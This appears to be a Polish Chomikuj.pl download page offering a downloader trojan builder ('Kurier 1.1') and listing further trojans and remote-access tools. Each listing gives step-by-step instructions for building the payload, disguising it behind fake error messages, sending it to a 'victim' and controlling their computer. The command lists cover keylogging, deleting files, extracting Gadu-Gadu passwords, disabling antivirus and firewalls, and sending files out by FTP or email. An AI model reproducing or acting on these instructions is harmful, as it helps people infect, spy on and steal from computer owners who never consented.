Wykorzystujemy pliki cookies i podobne technologie w celu usprawnienia korzystania z serwisu Chomikuj.pl oraz wyświetlenia reklam dopasowanych do Twoich potrzeb.

Jeśli nie zmienisz ustawień dotyczących cookies w Twojej przeglądarce, wyrażasz zgodę na ich umieszczanie na Twoim komputerze przez administratora serwisu Chomikuj.pl – Kelo Corporation.

W każdej chwili możesz zmienić swoje ustawienia dotyczące cookies w swojej przeglądarce internetowej. Dowiedz się więcej w naszej Polityce Prywatności - http://chomikuj.pl/PolitykaPrywatnosci.aspx.

Jednocześnie informujemy że zmiana ustawień przeglądarki może spowodować ograniczenie korzystania ze strony Chomikuj.pl.

W przypadku braku twojej zgody na akceptację cookies niestety prosimy o opuszczenie serwisu chomikuj.pl.

Wykorzystanie plików cookies przez Zaufanych Partnerów (dostosowanie reklam do Twoich potrzeb, analiza skuteczności działań marketingowych).

Wyrażam sprzeciw na cookies Zaufanych Partnerów
NIE TAK

Wyrażenie sprzeciwu spowoduje, że wyświetlana Ci reklama nie będzie dopasowana do Twoich preferencji, a będzie to reklama wyświetlona przypadkowo.

Istnieje możliwość zmiany ustawień przeglądarki internetowej w sposób uniemożliwiający przechowywanie plików cookies na urządzeniu końcowym. Można również usunąć pliki cookies, dokonując odpowiednich zmian w ustawieniach przeglądarki internetowej.

Pełną informację na ten temat znajdziesz pod adresem http://chomikuj.pl/PolitykaPrywatnosci.aspx.

Nie masz jeszcze własnego chomika? Załóż konto

Kurier 1.1.zip

Download: Kurier 1.1.zip

1,47 MB

0.0 / 5 (0 głosów)
Obsługa programu:
1. Program dostarcza i uruchamia niebezpieczne aplikacje na kompie ofiary.
Jest to trojan typu downloader, czyli taki w którym kiedy ofiara otworzy u siebie trojana, którego jej wysłaliśmy to ten ściągnie na jej dysk wskazany przez nas syf np. wirusy, robaki czy inne trojany.
2. Ściągamy skompresowany plik o nazwie Kurier v.1.zip
3. Dekompresujemy ten plik i wchodzimy do folderu.
4. Otwieramy u siebie plik o nazwie kurier v1.0.exe Za jego pomocą stworzymy naszego trojana.
5. Uzupełniasz wszystkie trzy okienka i klikasz na Generuj.
Powstaje plik trojan, mający rozmiar około 40KB, którego nie wolno otwierać bo syf zrobiłby się u nas, a tego byśmy przecież nie chcieli ;]
6. Teraz ten plik (trojana) którego stworzyłeś wysyłasz do swojej ofiary.
7. Jeżeli ofiara uruchomi naszego "kuriera", wyświetli się jej okno błędu np. "Plik uszkodzony!", program automatycznie pobierze z Internetu (z podanego mu linku) niebezpieczną aplikację i ją uruchomi bez wiedzy ofiary.

Komentarze:

Nie ma jeszcze żadnego komentarza. Dodaj go jako pierwszy!

Aby dodawać komentarze musisz się zalogować

Nie gwarantuję że pliki działają - większość z nich znalazłem na internecie i ich nie testowałem. Nie ponoszę także żadnej odpowiedzialności za straty poniesione w wyniku pobierania, używania i rozpowszechniania tych plików...


Inne pliki do pobrania z tego chomika
Trojan do łączenia się z komputerem ofiary przez GG. Obsługa: 1. Ściągamy skompresowany plik o nazwie "GG Control Tool 1.2.rar" 2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki: "GGControlToolv1.2.exe", "Serwer.exe" 3. Zakładamy nowy numer na GG. Zapisujemy jego numer i hasło. Odpalamy plik "GGControlToolv1.2.exe". Podajemy w nim numer i hasło przed chwilą założonego numeru, oraz nasz normalny numer. 4. Wypełniamu resztę rubryk, oraz zapisujemy konfigurację serwera. 5. Teraz wysyłamy plik "Serwer.exe" naszej ofierze, oraz dodajemy nowy numer gg do swojej listy kontaktów(ten, co wcześniej stworzyliśmy) 6. Gdy numer będzie dostępny, to znaczy że ofiara uruchomiła trojana, czyli można zacząć wysyłać komendy 7. Komendy można wysyłać tylko gdy numer jest dostępny
Obsługa programu: Zakładka Połączenia: Numer GG Serwera - zakładamy nowy nr gg ( Wpisujemy go w Numer GG Serwera ) Hasło - Tutaj podajemy hasło, które wpisaliśmy zakładając nowy nr gg (hasło do tego nr powyżej) Numer GG Klienta - Tutaj podajemy swój nr gg którego używamy na co dzień, Przez ten nr GG będą wysyłane komendy i odbierane informacje Zakładka Ftp: Jeśli nie posiadasz konta ftp to załóż je sobie np. na republice (www.republika.pl) Host - Tu podajemy Host naszego serwera ftp dla republiki to: ftp.republika.pl Login - tu wpisujemy nasz login do serwera ftp np. Karol Haslo - tu podajemy hasło do naszego serwera ftp np. Karol Zakładka Misc: Nazwa wpisu w rejestrze - Podajemy nazwę pod jaka serwer będzie wpisany w rejestrze Lokalizacja - Podajemy gdzie ma się serwer zainstalować Np. C:\Windows\Serwer.exe Komedy: info - pokazuje informacje o komputerze dir - przeglądanie folderu np. dir C:\ procesy - Wyświetlanie uruchomionych procesów kill - zabijanie wybranego procesu np. kill gg.exe reset - resetuje komputer poweroff - wyłącza komputer screen - zrzut ekranu (wymagany FTP) delfile - kasowanie wybranego pliku np. delfile C:\plik.exe deltree - kasowanie katalogu np. C:\katalog message - pokazuje wiadomość o danej treści np.message hello !!! hideclock - chowa zegar systemowy showclock - pokazuje zegar systemowy myszon - przemienia klawisze myszki myszoff - przywraca poprzedni stan klawiszy keyloggeron - Aktywuje keyloggera hdd - wyświetla wszystkie dyski keylogger - pokazuje zapisane klawisze keyloggeroff - Dezaktywuje keyloggera cmd - wykonanie polecenia systemowego np. cmd ping 127.0.0.1 powiedz - komputer wypowiada wpisane slowa np. powiedz Hello batch - po wpisaniu tego polecenia wpisuj komendy batch batchend - zapisuje wpisane komendy batch do pliku .bat chat - Uaktywnia czat z ofiara po słowie "chat" wpisujemy nick np. chat Zenek czatoff - Dezaktywuje czat deletegst - kasuje na stale serwer GST open - otwiera dany plik np. open C:\plik.exe hideopen - otwiera plik w trybie ukrytym end - zamyka polaczenie GST ietekst - zmienia tekst naglowka Internet Explorer np ietekst Internet Oxplorer iestartowa - zmienia strone startowa Internet Explorera np. iestartowa http://xlaski.pl ggcrack - wyciaga hasla z pliku config.dat np. ggcrack C:\program files\user\Ja1\config.dat uptime - pokazuje czas uruchomienia systemu obroc ekran - obraca ekran do "gory nogami" maxvol - ustawia glosnosc dzwieku na MAX Komendy FTP: ftpon - laczy z serwerem FTP ftpoff - rozlacza z serwerm FTP ftpadd - laduje plik na serwer FTP np. ftpadd C:\plik na dysku ofiary.exe ftpget - sciaga plik z serwera FTP np. ftpget plikNaFtp.exe ftpdel - kasuje plik na serwerze FTP np. ftpdel plik na serwerze ftp.exe ftplist - pokazuje wszystkie pliki na serwerze FTP config ftp - zdalna konfiguracja serwera FTP cfg klient - zmienia numer GG klienta np. cfg klient 123456 cfg load - Laduje konfiguracje z pliku
Mały trojan obsługiwany przez każdą przeglądarkę internetową. Obsługa: 1. Podsyłamy ofierze plik "winhttp.exe". Ona musi go otworzyć, a antywirus nic nie szczaić... 2. My zaś włączamy przeglądarkę (firefox, IE, itp.), i w pasek adresu wpisujemy: http://IP_KOMPUTERA_OFIARY:34280/`ahs 3. Pojawi się interfejs trojana. Dalej, już chyba wiadomo ;]
Obsługa programu: 1. Ściągamy skompresowany plik o nazwie "Destruktor 2.2.zip" 2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki: dest22.exe, fsg.exe, readme v2.2.pdf 3. Najpierw odpalamy plik o nazwie "readme v2.2.pdf" (czyli instrukcję obsługi. To właśnie z niej wszystkiego się dowiesz ;] ) 4. Ale w skrócie. Musisz odpalić u siebie plik dest22.exe. Jest to plik client. Za jego pomocą stworzysz plik serwer, który później podsyłasz swojej ofiarze. Za pomocą pliku dest22.exe również połączysz się z jej komputerem. 5. Plik "fsg.exe" to kompresor, służy do skompresowania pliku serwer żeby, po połączeniu z innym plikiem, nie zmienił się jego rozmiar.
Obsługa programu: 1. Ściągamy skompresowany plik o nazwie Angel 1.zip 2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki: Angel 1.2.exe, bezpieczny serwer.exe, Serwer.exe 3. Plik Serwer.exe wysyłamy do naszej ofiary. Tego pliku nie wolno otwierać, bo by się trojan zagnieździł w naszym systemie, a tego byśmy przecież nie chcieli :) 4. Następnie odpalamy u siebie plik Angel 1.2.exe. Uruchamia się program w którym musimy podać adres IP naszej ofiary i kliknąć na Połącz. Gdybyś chciał przetestować tego trojana na własnym kompie to: 1. Otwierasz plik bezpieczny serwer.exe (działa on na tej zasadzie że trojan się uruchomi na twoim kompie tylko nie doda się do auto startu i rejestru, więc dlatego jest nazwany bezpiecznym :) 2. Na razie nie zamykasz tego programu, tylko otwierasz plik Angel 1.2.exe w którym podajesz swój adres IP i klikasz na połącz. 3. Gotowe. Teraz możesz wykonywać komendy za pomocą pliku client (czyli Angel 1.2.exe) na własnym kompie. PS: Oczywiście plik bezpieczny serwer.exe służy tylko i wyłącznie do testowania trojana na własnym kompie. Do swojej ofiary musisz wysłać plik serwer.exe.
Obsługa programu: 1. Ściągamy skompresowany plik o nazwie "G@du-Ghost Trojan v2.2" 2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy plik: "GGT.v.2.2_b.exe" 3. Odpalamy plik "GGT.v.2.2_b.exe". Uruchamia się program za pomocą którego stworzymy plik serwer. 4. Następnie plik serwer który utworzyłeś podsyłasz do swojej ofiary. Ofiara musi ją otworzyć. Potem ty otwierasz program Gadu-Gadu i wykonujesz zdalne polecenia na kompie ofiary ;]
Obsługa programu: 1. Na początku powiem że ten trojan służy tylko i wyłącznie do zabicia lamerowi przydatnych mu programów np. antywirusa i firewalla, które odpowiadają za podstawowe bezpieczeństwo systemu. Ponadto możemy zablokować dostęp do rejestru, cmd, czy też nieznane programy. 2. Ściągamy plik "Black Killer 1.1.zip". Plik jest skompresowany, więc musimy go zdekompresować. Wchodzimy do zdekompresowanego folderu i widzimy plik o nazwie BlackKiLLer.exe. Odpalamy go. 3.Zaznaczamy interesujące nas opcje i klikamy na opcję Make BlackKiLLeR Plik serwer (czyli trojan) zostaje stworzony. Następnie wysyłamy go do naszej ofiary.
Obsługa programu: 1. Trojan jedynie z opcja przeglądania dysku. Na protokole FTP. 2. Ściągamy skompresowany plik o nazwie FTPHDD.zip 3. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy plik: FTP2HDD.exe. 4. Odpalamy plik FTP2HDD.exe. 5. Klikamy na opcję "Generuj serwer" Powstaje plik, który musimy wysłać do naszej ofiary. Ofiara musi go otworzyć. 6. Teraz klikasz na opcję "Używanie". Tam jest dalsza część instrukcji obsługi. Chyba wszystko jasne ;]
Obsługa programu: 1. Zakładamy numer Gadu-Gadu. Aby założyć numer GG, musimy uruchomić komunikator Gadu-Gadu, a następnie, z menu wybrać Użytkownik -> Nowy. Po założeniu numeru, zapisz sobie nowy numer, oraz hasło do niego. 2. Ściągamy skompresowany plik o nazwie AdminGG.zip Dekompresujemy ten plik i wchodzimy do folderu. Widzimy plik: AdminGG.exe 3. Uruchamiamy program Admin GG. W polu oznaczonym jako "numer gg" wpisujemy numer Gadu-Gadu, który wcześniej założyliśmy (patrz punkt 1), a w polu "hasło gg" hasło do tego numeru. Następnie klikamy na przycisk "Kompiluj", oraz wskazujemy miejsce gdzie ma zostać zapisany skonfigurowany przed chwilą plik. 4. Plik, który przed chwilą skonfigurowałeś uruchamiasz na komputerze, którym chcesz sterować. Np. Jeśli zamierzasz sterować komputerem kolegi, wysyłasz mu ten plik np. na emaila lub dajesz na dyskietce. Żeby program działał, kolega musi uruchomić ten plik na swoim komputerze. Następnie do swojej listy kontaktów, dodajesz numer, który założyłeś (punkt 1) i który posłużył ci do konfiguracji pliku, który wysłałeś do kolegi. Jeśli kolega uruchomił plik na swoim komputerze, numer który dodałeś do listy będzie miał status "Dostępny", w czasie gdy kolega będzie miał włączony komputer. Plik uruchomiony na komputerze kolegi, będzie się automatycznie włączał przy starcie systemu Windows. Uwaga! Nie możesz dać kilku osobom jednego, tego samego skonfigurowanego pliku! Dzieje się tak, ponieważ plik używa numeru Gadu-Gadu, który podałeś przy konfiguracji pliku. Jeden skonfigurowany plik może działać tylko na jednym komputerze. Gdy chcemy wysłać plik kilku osobom, należy dla każdej z nich skonfigurować osobny plik, każdy z nowym numerem Gadu-Gadu. 5. Jeśli wykonałeś poprawnie wszystkie instrukcje zawarte w punktach 1, 2, 3, 4 możesz rozpocząć sterowanie komputerem osoby, która uruchomiła skonfigurowany plik, np. kolega. Sterowanie odbywa się przez wysyłanie odpowiednich komend, na numer, który zapisałeś na liście kontaktów zgodnie z punktem czwartym. Lista komend: opencd - wysuwa tackę CD-ROM closecd - wsuwa tackę CD-ROM spo - wyłącza monitor turnscr - odwraca obraz na monitorze "do góry nogami" pulpithide - ukrywa ikony na pulpicie, tym samym go blokując pulpitshow - pokazuje ikony na pulpicie timehide - ukrywa zegarek systemowy timeshow - pokazuje zegarek systemowy shutdown - wyłącza komputer open "adres_strony" - uruchamia dowolną stronę internetową w domyślnej przeglądarce msg "tresc_komunikatu" - pokazuje komunikat o dowolnej treści np. "msg Mam cię!" help - pokazuje spis komend. 6. Komendy można wysyłać na odpowiedni numer jedynie wtedy, gdy jest on Dostępny na liście kontaktów. 7. Jeśli to wszystko przeczytałeś to brawo :)
Obsługa programu: 1. Program złodziej służy do wykradania plików (małych) 2. Ściągamy skompresowany plik o nazwie Złodziej.zip 3. Dekompresujemy ten plik i wchodzimy do folderu. 4. Odpalamy plik o nazwie "konfigurator.exe." 5. W konfiguratorze podajemy e-mail na który ma zostać wysłany plik i lokacje pliku np: gdy chcemy ściągnąć od kogoś plik to podajemy swój e-mail i dowiadujemy się gdzie znajduje się plik który chcemy ściągnąć.Jeżeli ktoś np: posiada plik haslo.txt to musimy się dowiedzieć gdzie go trzyma np: C:\haslo.txt wpisujemy to w lokacje! WPISYWAĆ DOKŁADNIE! Klikamy Generuj. Powstaje Plik.exe (czyli trojan), możemy zmienić nazwę, ikonę i wysyłać ofiarze. 6.PLIK JEST NIEGROŹNY!!! po odpaleniu trojana wyskakuje fałszywy błąd: ERROR 615632187x Nie znaleziono taskmgr.dll który ma wprowadzić w błąd. Program wysyła podany plik z lokacji na e-mail i się wyłącza...
więcej plików z tego folderu...
Zgłoś jeśli naruszono regulamin
W ramach Chomikuj.pl stosujemy pliki cookies by umożliwić Ci wygodne korzystanie z serwisu. Jeśli nie zmienisz ustawień dotyczących cookies w Twojej przeglądarce, będą one umieszczane na Twoim komputerze. W każdej chwili możesz zmienić swoje ustawienia. Dowiedz się więcej w naszej Polityce Prywatności